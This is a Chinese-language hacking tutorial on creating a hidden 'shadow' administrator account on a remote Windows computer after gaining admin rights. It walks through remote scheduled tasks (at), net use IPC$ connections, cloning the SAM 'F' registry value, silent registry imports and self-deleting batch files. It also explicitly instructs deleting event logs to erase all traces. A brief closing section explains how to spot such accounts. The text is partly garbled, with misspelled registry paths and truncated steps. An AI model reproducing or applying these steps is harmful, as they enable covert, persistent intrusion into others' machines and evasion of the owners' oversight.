步骤:
1、取得远程电脑的最高权限(管理员权限),要取得远程电脑管理员权限的方法很多,难度视对方电脑的防备水平如何。如何取得权限,就不多介绍了。
2、利用各种工具,开启远程电脑的远程注册表、定时任务服务.server服务功能。
3、编写“添加管理员帐户”的DOS命令程序,也就是COM或BAT程序,程序要内含运行窗口自动关闭和自我清除功能以便清除痕迹(俗称擦'屁股')。并上传这些文件到对方电脑上(隐藏在不容易发现的角落即可)。
4、为了远程在对方电脑上运行这些DOS命令,现制作远程电脑的任务定时计划(系统级别运行的),在本地DOS环境下输入如下命令:at \\xx.xx.xx.xx time\\xx.xx.xx.xx\DOS程序的文件路径
5、可以通过如下命令测试远程添加帐户是否成功:net use \\xx.xx.xx.xx\ipc$ "密码" /user:"帐户名",如果显示远程连接成功。则添加帐户成功!
6、退出已经连接的添加帐户:net use \\xx.xx.xx.xx\ipc$ /del
7、运行本机电脑的regedt32.exe 程序,连接远程电脑xx.xx.xx.xx,给SAM注册表项设置自己拥有的远程电脑的管理员权限为完全控制。退出regedt32程序。开启regedit.exe程序,连接远程电脑注册表。在SAM下面的项中的,把目前已拥有的管理员帐户的F项键值复制到添加的管理员帐户对应的F键值。
8、把远程电脑上的注册表上的新管理员帐户键值导出,可用如下命令:at \\xx.xx.xx.xx time \\xx.xx.xx.xx\admin$\regedit.exe /e 注册表名.reg 要导出的注册表路径
9、制作删除刚添加的管理员帐户的DOS命令程序,并定时在远程电脑上运行。测试,确保帐户删除成功。
10、在远程电脑上导入刚才导出的注册表:at \\xx.xx.xx.xx time \\xx.xx.xx.xx\admin$\regedit.exe /s 注册表名.reg (/S,静默方式导入)
11、将远程注册表上的SAM权限改为只保留系统级帐户修改的权限,。也就是还原原权限。
12、利用MT程序,在远程电脑上删除系统记录的日志。擦除掉一切显露你痕迹的尾巴。记得做事要干净。
13、远程连接电脑,用建立的影子帐户登录。测试成功并查看远程电脑里的帐户里没有显出帐户即可!
影子帐户相当于一个administrator帐户,密码administrator相同,当administrator密码变时,影子帐户密码不变,而帐户密码改变时administrator帐户密码跟着改变,常规方法看不到影子帐户,
只能到注册表去。
建立影子帐户步骤如下:
定位 “HKEY_MACHNE\SAM\SAM\Domains\Account\user\Names\Administrator记住就行了)
保存双击导入注册表。
《XXX为任意名》
查找影子帐户办法:”打开注册表,定位到“HKEY_MACHNE\SAM\SAM\Domains\Account\user\Names\Administrator”查看默认值。
2 “HKEY_MACHNE\SAM\SAM\Domains\Account\user\Names”只要跟上边值相同就为影子帐户。
(有时影子帐户不一定是Administrator的,也可能是普通帐户的